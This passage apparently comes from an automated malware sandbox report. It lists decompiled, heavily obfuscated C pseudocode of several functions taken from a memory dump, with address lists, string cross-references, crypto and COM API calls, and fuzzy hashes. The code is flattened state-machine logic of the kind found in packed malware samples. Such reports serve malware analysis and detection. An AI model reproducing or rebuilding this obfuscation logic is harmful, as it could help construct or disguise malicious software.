				_v40 = _v40 ^ 0x000003d1;
				_v28 = 0xdfec;
				_v28 = _v28 >> 6;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x001be0b4;
				_v20 = 0x73b;
				_v20 = _v20 ^ 0xd6615083;
				_v20 = _v20 ^ 0xd6610707;
				_v36 = 0x46b8;
				_v36 = _v36 | 0xf1966772;
				_v36 = _v36 ^ 0x374c3a36;
				_v36 = _v36 * 0x27;
				_v36 = _v36 ^ 0x4b440184;
				_v8 = 0xd697;
				_v8 = _v8 ^ 0x6f8084df;
				_v8 = _v8 ^ 0x6f807f26;
				_t171 = _v4;
				while(_t148 != 0x24e4c4b) {
					if(_t148 == 0xc9f1fee) {
						_t148 = 0x3ad8e818;
						continue;
					} else {
						if(_t148 == 0x1ffca7a2) {
							E00221AB6(1, _v12, _t148, _a20, 1, _v24, _v16, _v4, _a4, _v40, _v28, _v20);
							_t175 =  &(_t175[0xa]);
							_t148 = 0x24e4c4b;
							_t172 =  !=  ? 1 : _t172;
							continue;
						} else {
							if(_t148 == 0x34494570) {
								if(E00220729(_v32,  &_v4, _v44, _t171) != 0) {
									_t148 = 0x1ffca7a2;
									continue;
								}
							} else {
								if(_t148 != 0x3ad8e818) {
									L13:
									if(_t148 != 0x2a0664e6) {
										continue;
									}
								} else {
									_t144 = E0021F6DF(_t148);
									_t171 = _t144;
									if(_t144 != 0xffffffff) {
										_t148 = 0x34494570;
										continue;
									}
								}
							}
						}
					}
					return _t172;
				}
				E00224F7D(_v36, _v8, _v4);
				_t148 = 0x2a0664e6;
				goto L13;
			}

0x002117b3
0x002117ba
0x002117bb
0x002117bc
0x002117c0
0x002117c4
0x002117c6
0x002117cb
0x002117d3
0x002117dc
0x002117de
0x002117e5
0x002117ea
0x002117f0
0x002117fc
0x00211801
0x00211807
0x0021180f
0x0021181c
0x0021181f
0x0021182b
0x0021182f
0x00211837
0x0021183f
0x00211847
0x0021184f
0x00211853
0x0021185b
0x00211863
0x0021186b
0x00211873
0x0021187b
0x00211883
0x0021188b
0x00211890
0x00211898
0x002118a5
0x002118a6
0x002118aa
0x002118af
0x002118b7
0x002118bf
0x002118c4
0x002118cc
0x002118d9
0x002118e3
0x002118e7
0x002118ec
0x002118f4
0x002118fc
0x00211901
0x00211906
0x0021190e
0x00211916
0x0021191e
0x00211926
0x00211933
0x0021193b
0x00211948
0x0021194c
0x00211954
0x0021195c
0x00211964
0x0021196c
0x00211970
0x00211982
0x00211a1a
0x00000000
0x00211988
0x0021198a
0x00211a03
0x00211a08
0x00211a0b
0x00211a12
0x00000000
0x0021198c
0x00211992
0x002119d5
0x002119d7
0x00000000
0x002119d7
0x00211994
0x0021199a
0x00211a3b
0x00211a41
0x00000000
0x00000000
0x002119a0
0x002119a8
0x002119ad
0x002119b2
0x002119b8
0x00000000
0x002119b8
0x002119b2
0x0021199a
0x00211992
0x0021198a
0x00211a50
0x00211a50
0x00211a30
0x00211a36
0x00000000

Strings

>, xrefs: 00211883
$z, xrefs: 0021180F
pEI4, xrefs: 002119B8
pEI4, xrefs: 0021198C
N9, xrefs: 002118C4
6:L7, xrefs: 0021193B

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: >$$z$6:L7$N9$pEI4$pEI4
API String ID: 0-302225334
Opcode ID: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
Instruction ID: efc6ff9caee82071bc85b84eb371b3f1c334e23922204b3d4fa5e30623616400
Opcode Fuzzy Hash: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
Instruction Fuzzy Hash: 666165711183419FD358CE65D88581FBBE1BFC4358F444A1DF2A696260C3B5CAAACF83

Uniqueness

Uniqueness Score: -1.00%

Function 002220C5, Relevance: 7.6, Strings: 6, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002220C5() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				void* _t124;
				short* _t127;
				void* _t132;
				void* _t134;
				intOrPtr _t150;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t167;
				void* _t169;

				_t169 = (_t167 & 0xfffffff8) - 0x250;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t132 = 0x3ec8c14;
				_v536 = 0x37230;
				_v544 = 0xcdd0;
				_v544 = _v544 >> 7;
				_v544 = _v544 ^ 0x000074a7;
				_v572 = 0xb951;
				_v572 = _v572 + 0xffffa9df;
				_v572 = _v572 ^ 0x00005eca;
				_v584 = 0x3783;
				_v584 = _v584 >> 1;
				_t159 = 0x30;
				_v584 = _v584 / _t159;
				_v584 = _v584 ^ 0x00007df0;
				_v592 = 0x764f;
				_t160 = 0x29;
				_v592 = _v592 * 0x6c;
				_v592 = _v592 + 0xffff1483;
				_v592 = _v592 ^ 0x0030effe;
				_v580 = 0x26e4;
				_v580 = _v580 + 0xffffa17d;
				_v580 = _v580 >> 0xc;
				_v580 = _v580 ^ 0x000fb6a3;
				_v588 = 0x592d;
				_v588 = _v588 * 0x5e;
				_v588 = _v588 + 0xfffff058;
				_v588 = _v588 ^ 0x0020c0b6;
				_v576 = 0x67c6;
				_v576 = _v576 >> 4;
				_v576 = _v576 | 0x70f0481f;
				_v576 = _v576 ^ 0x70f020ed;
				_v568 = 0x5c9a;
				_v568 = _v568 ^ 0x6d262440;
				_v568 = _v568 ^ 0x6d2624e4;
				_v552 = 0x512d;
				_v552 = _v552 / _t160;
				_v552 = _v552 ^ 0x00002fd7;
				_v540 = 0x67a3;
				_v540 = _v540 + 0x741c;
				_v540 = _v540 ^ 0x0000c39d;
				_v560 = 0xac4b;
				_v560 = _v560 | 0x611015d1;
				_v560 = _v560 ^ 0x6110f087;
				_v548 = 0xff97;
				_v548 = _v548 >> 8;
				_v548 = _v548 ^ 0x000016db;
				_v556 = 0xce04;
				_t161 = 0x2b;
				_v556 = _v556 / _t161;
				_v556 = _v556 ^ 0x000048b5;
				_v564 = 0x85d6;
				_v564 = _v564 >> 0xf;
				_v564 = _v564 ^ 0x00007642;
				do {
					while(_t132 != 0x3ec8c14) {
						if(_t132 == 0x4e3e716) {
							_push(_v572);
							_t124 = E0022889D(0x22c9b0, _v544, __eflags);
							_pop(_t134);
							_t150 =  *0x22ca2c; // 0x558300
							_t108 = _t150 + 0x230; // 0x680053
							E0021C680(_t108, _v592, _v580, _t134, _v588,  *0x22ca2c, _t124,  &_v524);
							_t169 = _t169 + 0x1c;
							_t127 = E00222025(_v576, _t124, _v568, _v552);
							_t132 = 0x36d909ae;
							continue;
						} else {
							if(_t132 == 0x2942dba3) {
								_t127 = E00222B16(_v548,  &_v524, E002284CC, _v564, 0,  &_v524);
							} else {
								if(_t132 != 0x36d909ae) {
									goto L8;
								} else {
									_t127 = E002128CE( &_v524, _v540, _v560);
									 *_t127 = 0;
									_t132 = 0x2942dba3;
									continue;
								}
							}
						}
						L11:
						return _t127;
					}
					_t132 = 0x4e3e716;
					L8:
					__eflags = _t132 - 0x16e8989b;
				} while (__eflags != 0);
				goto L11;
			}

0x002220cb
0x002220d1
0x002220d8
0x002220dd
0x002220e2
0x002220ea
0x002220f2
0x002220f7
0x002220ff
0x00222107
0x0022210f
0x00222117
0x0022211f
0x0022212d
0x00222132
0x00222138
0x00222145
0x0022215c
0x0022215f
0x00222163
0x0022216b
0x00222173
0x0022217b
0x00222183
0x00222188
0x00222190
0x0022219d
0x002221a1
0x002221a9
0x002221b1
0x002221b9
0x002221be
0x002221c6
0x002221ce
0x002221d6
0x002221de
0x002221e6
0x002221f6
0x002221fa
0x00222202
0x0022220a
0x00222212
0x0022221a
0x00222222
0x0022222a
0x00222232
0x0022223a
0x0022223f
0x00222247
0x00222253
0x00222256
0x0022225a
0x00222262
0x0022226a
0x0022226f
0x00222277
0x00222277
0x00222285
0x002222ae
0x002222bb
0x002222c0
0x002222dc
0x002222e6
0x002222ec
0x002222f1
0x00222302
0x00222309
0x00000000
0x00222287
0x00222289
0x00222339
0x0022228f
0x00222291
0x00000000
0x00222293
0x0022229f
0x002222a7
0x002222aa
0x00000000
0x002222aa
0x00222291
0x00222289
0x00222341
0x00222348
0x00222348
0x00222310
0x00222312
0x00222312
0x00222312
0x00000000

Strings

-Q, xrefs: 002221E6
Ov, xrefs: 00222145
-Y, xrefs: 00222190
Bv, xrefs: 0022226F
&, xrefs: 00222173
$&m, xrefs: 002221DE

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: -Q$-Y$Bv$Ov$$&m$&
API String ID: 0-2434786051
Opcode ID: 92a76aacb0a25ae6753b2661cb6d221cc6f0912ea0cf19d6f78e76f55f19b89a
Instruction ID: 8a51fc1733521206fb264d35828c82f71717af9521bd7df613729e1ba0376f6e
Opcode Fuzzy Hash: 92a76aacb0a25ae6753b2661cb6d221cc6f0912ea0cf19d6f78e76f55f19b89a
Instruction Fuzzy Hash: 2D516771118341EFD368CF61D88A91BBBE1FBC4328F505A1DF585462A0C7B68959CF83

Uniqueness

Uniqueness Score: -1.00%

Function 100021F0, Relevance: 7.6, APIs: 5, Instructions: 67encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
CoTaskMemAlloc.OLE32(?), ref: 10002227
CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
CoTaskMemFree.OLE32(00000000), ref: 1000227A

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: BinaryCryptStringTask$AllocDeserializeFreePropVariant
String ID:
API String ID: 2967290590-0
Opcode ID: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
Instruction ID: 3bbe9fb0322c03d3a19eaaaaa04faf6b757ff22615bcfcbc1accf4c01beb8128
Opcode Fuzzy Hash: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
Instruction Fuzzy Hash: 51116D3AA01129BBEB10DBD48C44FDE77FCDB457A1F010266FE05E2154DA719A408AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00216754, Relevance: 6.4, Strings: 5, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00216754(intOrPtr __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				unsigned int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				void* _t96;
				signed int _t97;
				signed int _t101;
				intOrPtr _t104;
				signed int _t106;
				signed int _t107;
				void* _t108;
				signed int _t123;
				void* _t124;
				intOrPtr* _t128;
				signed int* _t129;

				_t129 =  &_v572;
				_v524 = _v524 & 0x00000000;
				_v532 = 0x37527f;
				_v528 = 0x4295e6;
				_v536 = 0xee22;
				_v536 = _v536 >> 0xc;
				_v536 = _v536 ^ 0x00007a3a;
				_v544 = 0x8f72;
				_v544 = _v544 | 0xa1a2610a;
				_v544 = _v544 ^ 0xa1a2ad19;
				_v540 = 0xc65b;
				_v540 = _v540 << 9;
				_v540 = _v540 ^ 0x018ca8d5;
				_v572 = 0x4354;
				_v572 = _v572 << 0xd;
				_v572 = _v572 + 0xffff6940;
				_v572 = _v572 * 0x52;
				_t128 = __edx;
				_v572 = _v572 ^ 0xb1ecefd2;
				_v552 = 0x7a0c;
				_t104 = __ecx;
				_v552 = _v552 | 0xfffddbf7;
				_t124 = 0x1663684c;
				_v552 = _v552 ^ 0xfffd8a47;
				_v568 = 0x9348;
				_t106 = 0xf;
				_v568 = _v568 * 0x32;
				_v568 = _v568 + 0x92e3;
				_v568 = _v568 * 0x69;
				_v568 = _v568 ^ 0x0c08d7a0;
				_v556 = 0x9f50;
				_v556 = _v556 / _t106;
				_v556 = _v556 >> 2;
				_v556 = _v556 ^ 0x000022d0;
				_v548 = 0xa3e1;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 ^ 0x000031bd;
				_v564 = 0x55b6;
				_v564 = _v564 >> 1;
				_v564 = _v564 + 0xaf4f;
				_t107 = 0x5e;
				_t123 = _v548;
				_v564 = _v564 / _t107;
				_v564 = _v564 ^ 0x0000417a;
				_v560 = 0xe775;
				_v560 = _v560 << 4;
				_v560 = _v560 << 0xd;
				_v560 = _v560 ^ 0xceea6264;
				do {
					while(_t124 != 0x32e36bf) {
						if(_t124 == 0xcc4ee6e) {
							 *((intOrPtr*)(_t123 + 0x24)) = _t104;
							_t97 =  *0x22ca24; // 0x0
							 *(_t123 + 0x2c) = _t97;
							 *0x22ca24 = _t123;
							return _t97;
						}
						if(_t124 != 0x1663684c) {
							if(_t124 == 0x2308bbf2) {
								return E0021F536(_v548, _v564, _v560, _t123);
							}
							if(_t124 != 0x242d3c72) {
								goto L12;
							} else {
								_push( &_v520);
								_t101 = E002188E5(_t104, _t128);
								asm("sbb esi, esi");
								_t107 = 0x22c910;
								_t124 = ( ~_t101 & 0xe0257acd) + 0x2308bbf2;
								continue;
							}
							L16:
							return _t101;
						}
						_push(_t107);
						_t108 = 0x38;
						_t101 = E00218736(_t108);
						_t123 = _t101;
						_t107 = _t107;
						if(_t123 != 0) {
							_t124 = 0x242d3c72;
							continue;
						}
						goto L16;
					}
					_push(_t107);
					_push(_v556);
					_push( &_v520);
					_push(_v568);
					_push(0);
					_push(_v552);
					_t107 = _v572;
					_push(0);
					_t96 = E0021568E(_t107, 0);
					_t129 =  &(_t129[7]);
					if(_t96 == 0) {
						_t124 = 0x2308bbf2;
						goto L12;
					} else {
						_t124 = 0xcc4ee6e;
						continue;
					}
					goto L16;
					L12:
				} while (_t124 != 0x2bbec955);
				return _t101;
			}

0x00216754
0x0021675a
0x0021675f
0x00216767
0x0021676f
0x00216777
0x0021677c
0x00216784
0x0021678c
0x00216794
0x0021679c
0x002167a4
0x002167a9
0x002167b1
0x002167b8
0x002167bc
0x002167cb
0x002167cf
0x002167d1
0x002167db
0x002167e3
0x002167e5
0x002167ed
0x002167f2
0x002167fa
0x00216809
0x0021680c
0x00216810
0x0021681d
0x00216821
0x00216829
0x00216839
0x0021683d
0x00216842
0x0021684a
0x00216852
0x00216857
0x0021685f
0x00216867
0x0021686b
0x00216877
0x0021687a
0x0021687e
0x00216882
0x0021688a
0x00216892
0x00216897
0x0021689c
0x002168a4
0x002168a4
0x002168b2
0x00216984
0x00216987
0x0021698c
0x0021698f
0x00000000
0x0021698f
0x002168be
0x002168c6
0x00000000
0x00216981
0x002168d2
0x00000000
0x002168d8
0x002168de
0x002168e6
0x002168f0
0x002168f8
0x002168f9
0x00000000
0x002168f9
0x0021699f
0x0021699f
0x0021699f
0x0021690d
0x00216911
0x00216912
0x00216917
0x0021691a
0x0021691d
0x0021691f
0x00000000
0x0021691f
0x00000000
0x0021691d
0x00216929
0x0021692a
0x00216934
0x00216935
0x00216939
0x0021693b
0x0021693f
0x00216943
0x00216945
0x0021694a
0x0021694f
0x0021695b
0x00000000
0x00216951
0x00216951
0x00000000
0x00216951
0x00000000
0x00216960
0x00216960
0x00000000

Strings

:z, xrefs: 0021677C
r<-$, xrefs: 0021691F
zA, xrefs: 00216882
r<-$, xrefs: 002168CC
u, xrefs: 0021688A

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: :z$r<-$$r<-$$u$zA
API String ID: 0-4189644680
Opcode ID: 032ce5a056cd8b286eafdd1a8928f87fb633a9695606a4754f1df76159781b6b
Instruction ID: be6dc02c0038b88874607db4b669310d8e3779af8ae5305ff1f3931ccae9dfac
Opcode Fuzzy Hash: 032ce5a056cd8b286eafdd1a8928f87fb633a9695606a4754f1df76159781b6b
Instruction Fuzzy Hash: D751A9715183029FD318CF26C84955FBBE0EBD8758F114A1DF4D8A62A0D7B48A59CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0021839D, Relevance: 6.4, Strings: 5, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0021839D(void* __ecx, void* __edi) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				int _t181;
				signed int _t184;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed int _t194;
				void* _t211;
				void* _t215;
				signed int _t217;

				_v28 = 0x5ca2;
				_v28 = _v28 + 0x82ee;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x06fc8008;
				_v52 = 0x31f1;
				_v52 = _v52 * 0x4e;
				_t215 = __ecx;
				_t186 = 0x39;
				_v52 = _v52 * 0x4d;
				_v52 = _v52 >> 7;
				_v52 = _v52 ^ 0x00092748;
				_v20 = 0x7fc5;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x00d59d54;
				_v44 = 0xb39b;
				_v44 = _v44 + 0xf7d;
				_v44 = _v44 | 0x2a7b5142;
				_v44 = _v44 + 0xffff17c4;
				_v44 = _v44 ^ 0x2a7aeb0e;
				_v60 = 0x1587;
				_v60 = _v60 | 0x5979cfaa;
				_v60 = _v60 ^ 0xb2ac8491;
				_v60 = _v60 ^ 0x62b96002;
				_v60 = _v60 ^ 0x896c4508;
				_v16 = 0x3e7;
				_v16 = _v16 | 0x10c95731;
				_v16 = _v16 ^ 0x10c93485;
				_v56 = 0x1ea8;
				_v56 = _v56 << 4;
				_v56 = _v56 << 6;
				_v56 = _v56 / _t186;
				_v56 = _v56 ^ 0x0002353c;
				_v12 = 0x5bc0;
				_t187 = 0x13;
				_v12 = _v12 / _t187;
				_v12 = _v12 ^ 0x00001b6c;
				_v48 = 0x8f53;
				_v48 = _v48 ^ 0x72e3c217;
				_v48 = _v48 >> 0xb;
				_v48 = _v48 ^ 0x701cd0a1;
				_v48 = _v48 ^ 0x7012c214;
				_v24 = 0xa180;
				_v24 = _v24 | 0x7584ea2b;
				_v24 = _v24 + 0x36fb;
				_v24 = _v24 ^ 0x75854120;
				_v32 = 0x424b;
				_v32 = _v32 ^ 0x8f16dfbf;
				_v32 = _v32 << 0xc;
				_v32 = _v32 + 0xffffa50c;
				_v32 = _v32 ^ 0x69defe02;
				_v8 = 0x6622;
				_t188 = 0x62;
				_v8 = _v8 / _t188;
				_v8 = _v8 ^ 0x00007651;
				_v36 = 0x9705;
				_t189 = 0x5a;
				_v36 = _v36 * 0x11;
				_v36 = _v36 / _t189;
				_v36 = _v36 | 0xcd876993;
				_v36 = _v36 ^ 0xcd872ff9;
				_v40 = 0x44cf;
				_v40 = _v40 | 0x3f74ab7e;
				_v40 = _v40 << 1;
				_v40 = _v40 + 0x396f;
				_v40 = _v40 ^ 0x7eea1d0a;
				_v4 = E00228C8F(_t189);
				_t217 = _v28 + E00228C8F(_t189) % _v52;
				_t184 = _v20 + E00228C8F(_v52) % _v44;
				if(_t217 != 0) {
					_t211 = _t215;
					_t194 = _t217 >> 1;
					_t215 = _t215 + _t217 * 2;
					_t181 = memset(_t211, 0x2d002d, _t194 << 2);
					asm("adc ecx, ecx");
					memset(_t211 + _t194, _t181, 0);
				}
				E0021D6C9(_v8, _t215, 3, _t184, _v36,  &_v4, _v40);
				 *((short*)(_t215 + _t184 * 2)) = 0;
				return 0;
			}

0x002183a0
0x002183aa
0x002183b2
0x002183b7
0x002183bf
0x002183d1
0x002183d5
0x002183dc
0x002183df
0x002183e3
0x002183e8
0x002183f0
0x002183fd
0x00218401
0x00218406
0x0021840e
0x00218416
0x0021841e
0x00218426
0x0021842e
0x00218436
0x0021843e
0x00218446
0x0021844e
0x00218456
0x0021845e
0x00218466
0x0021846e
0x00218476
0x0021847e
0x00218483
0x00218490
0x00218494
0x0021849c
0x002184a8
0x002184ad
0x002184b3
0x002184bb
0x002184c3
0x002184cb
0x002184d0
0x002184d8
0x002184e0
0x002184e8
0x002184f0
0x002184f8
0x00218500
0x00218508
0x00218510
0x00218515
0x0021851d
0x00218525
0x00218531
0x00218536
0x0021853c
0x00218544
0x00218551
0x00218552
0x0021855c
0x00218560
0x00218568
0x00218570
0x00218578
0x00218580
0x00218584
0x0021858c
0x002185a1
0x002185c2
0x002185d9
0x002185dd
0x002185e2
0x002185e4
0x002185e6
0x002185ee
0x002185f0
0x002185f2
0x002185f5
0x0021860f
0x00218619
0x00218623

Strings

KB, xrefs: 00218500
Qv, xrefs: 0021853C
BQ{*, xrefs: 0021841E
H', xrefs: 002183E8
o9, xrefs: 00218584

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: BQ{*$H'$KB$Qv$o9
API String ID: 0-3657823386
Opcode ID: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
Instruction ID: 9a993de89c5b850f08977b852173c0f4a1539a0617684e4d27b4f81d54277026
Opcode Fuzzy Hash: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
Instruction Fuzzy Hash: 6A6101711093419FD348CF25D58A50BBBE1FBC8748F408A1DF1DA96260D7B9DA198F86

Uniqueness

Uniqueness Score: -1.00%

Function 00215B79, Relevance: 5.2, Strings: 4, Instructions: 219
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00215B79(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr* _t203;
				intOrPtr _t214;
				intOrPtr _t215;
				intOrPtr _t216;
				intOrPtr _t220;
				intOrPtr _t224;
				void* _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				intOrPtr _t250;
				intOrPtr _t252;
				signed int* _t253;

				_t215 = __ecx;
				_t253 =  &_v116;
				_v20 = __edx;
				_v32 = __ecx;
				_v12 = 0xafae1;
				_v4 = 0;
				_v8 = 0x46e7c7;
				_v100 = 0x4e85;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0xa122;
				_v100 = _v100 ^ 0x0000ef7f;
				_v76 = 0x276c;
				_v76 = _v76 + 0xa4ad;
				_v76 = _v76 ^ 0x0000a5d4;
				_v116 = 0xc292;
				_v36 = 0;
				_v116 = _v116 * 0x3d;
				_t243 = 0x5ac7f3d;
				_v116 = _v116 << 0xc;
				_t246 = 0x1a;
				_v116 = _v116 / _t246;
				_v116 = _v116 ^ 0x08d6c610;
				_v96 = 0x57a;
				_v96 = _v96 << 4;
				_v96 = _v96 + 0xde71;
				_v96 = _v96 ^ 0x000109c0;
				_v108 = 0xf9e9;
				_v108 = _v108 >> 0xe;
				_v108 = _v108 + 0xffffa4d5;
				_t247 = 0x1e;
				_v108 = _v108 * 0x3c;
				_v108 = _v108 ^ 0xffeac835;
				_v112 = 0x3502;
				_v112 = _v112 >> 0xc;
				_v112 = _v112 + 0xffffe509;
				_v112 = _v112 >> 0xe;
				_v112 = _v112 ^ 0x0003f015;
				_v64 = 0x4162;
				_v64 = _v64 + 0xffff06ec;
				_v64 = _v64 ^ 0xffff0d41;
				_v68 = 0x29f6;
				_v68 = _v68 | 0xa40114db;
				_v68 = _v68 ^ 0xa4015458;
				_v72 = 0x8ebc;
				_v72 = _v72 | 0xb773f5bd;
				_v72 = _v72 ^ 0xb773df20;
				_v52 = 0x199c;
				_v52 = _v52 + 0x59c9;
				_v52 = _v52 ^ 0x00005d96;
				_v56 = 0x9de2;
				_v56 = _v56 | 0x18b104fc;
				_v56 = _v56 ^ 0x18b18c09;
				_v60 = 0xcf04;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x0000237a;
				_v92 = 0x847f;
				_v92 = _v92 / _t247;
				_v92 = _v92 + 0xfffff45a;
				_v92 = _v92 ^ 0xffffeb4a;
				_v104 = 0x72c3;
				_v104 = _v104 * 0x70;
				_v104 = _v104 >> 0xa;
				_v104 = _v104 + 0xffffb2c0;
				_v104 = _v104 ^ 0xffff9126;
				_v48 = 0x26a;
				_t248 = 0x5f;
				_v48 = _v48 / _t248;
				_v48 = _v48 ^ 0x00002d62;
				_v88 = 0x3bd5;
				_v88 = _v88 | 0xeefd350a;
				_v88 = _v88 >> 1;
				_v88 = _v88 ^ 0x777ec4bd;
				_v44 = 0x124c;
				_v44 = _v44 + 0xffff1b1d;
				_v44 = _v44 ^ 0xffff4aeb;
				_v80 = 0x5ade;
				_t249 = 0x3c;
				_t252 = _v20;
				_t214 = _v20;
				_v80 = _v80 * 0x3a;
				_v80 = _v80 + 0xffff943f;
				_v80 = _v80 ^ 0x0014640e;
				_v84 = 0x6f1d;
				_t250 = _v16;
				_v84 = _v84 / _t249;
				_v84 = _v84 * 0x74;
				_v84 = _v84 ^ 0x0000fa63;
				_t199 = _v40;
				while(_t243 != 0x5ac7f3d) {
					if(_t243 == 0x17993a65) {
						_t216 = E0022023A(_t215, _v96, _v108, _t199, _v112, _t252,  &_v28);
						_t253 =  &(_t253[5]);
						_v36 = _t216;
						if(_t216 == 0) {
							_t244 = _v36;
							goto L19;
						} else {
							_t220 = _v28;
							if(_t220 == 0) {
								goto L15;
							} else {
								_t199 = _v40 + _t220;
								_v40 = _v40 + _t220;
								_t252 = _t252 - _t220;
								if(_t252 != 0) {
									goto L6;
								} else {
									_t224 = _t250 + _t250;
									_push(_t224);
									_push(_t224);
									_v24 = _t224;
									_t245 = E00218736(_t224);
									if(_t245 == 0) {
										goto L15;
									} else {
										E00222674(_v52, _v56, _t250, _t245, _v60, _v92, _t214);
										E0021F536(_v104, _v48, _v88, _t214);
										_t252 = _t250;
										_t199 = _t245 + _t250;
										_t250 = _v24;
										_t253 =  &(_t253[7]);
										_v40 = _t199;
										_t214 = _t245;
										if(_t252 == 0) {
											goto L15;
										} else {
											goto L6;
										}
									}
								}
							}
						}
					} else {
						if(_t243 != 0x1ebe7f62) {
							L14:
							if(_t243 != 0x20fb0f57) {
								continue;
							} else {
								goto L15;
							}
						} else {
							_t250 = 0x10000;
							_push(_t215);
							_push(_t215);
							_t199 = E00218736(0x10000);
							_t214 = _t199;
							if(_t214 == 0) {
								L15:
								_t244 = _v36;
								if(_t244 == 0) {
									L19:
									E0021F536(_v44, _v80, _v84, _t214);
								} else {
									_t203 = _v20;
									 *_t203 = _t214;
									 *((intOrPtr*)(_t203 + 4)) = _t250 - _t252;
								}
							} else {
								_v40 = _t199;
								_t252 = 0x10000;
								L6:
								_t215 = _v32;
								_t243 = 0x17993a65;
								continue;
							}
						}
					}
					return _t244;
				}
				_t243 = 0x1ebe7f62;
				goto L14;
			}

0x00215b79
0x00215b79
0x00215b80
0x00215b84
0x00215b88
0x00215b92
0x00215b99
0x00215ba1
0x00215ba9
0x00215bae
0x00215bb6
0x00215bbe
0x00215bc6
0x00215bce
0x00215bd6
0x00215bde
0x00215be7
0x00215beb
0x00215bf0
0x00215bfd
0x00215c02
0x00215c08
0x00215c10
0x00215c18
0x00215c1d
0x00215c25
0x00215c2d
0x00215c35
0x00215c3a
0x00215c47
0x00215c48
0x00215c4c
0x00215c54
0x00215c5c
0x00215c61
0x00215c69
0x00215c6e
0x00215c76
0x00215c7e
0x00215c86
0x00215c8e
0x00215c96
0x00215c9e
0x00215ca6
0x00215cae
0x00215cb6
0x00215cbe
0x00215cc6
0x00215cce
0x00215cd6
0x00215cde
0x00215ce6
0x00215cee
0x00215cf6
0x00215cfb
0x00215d03
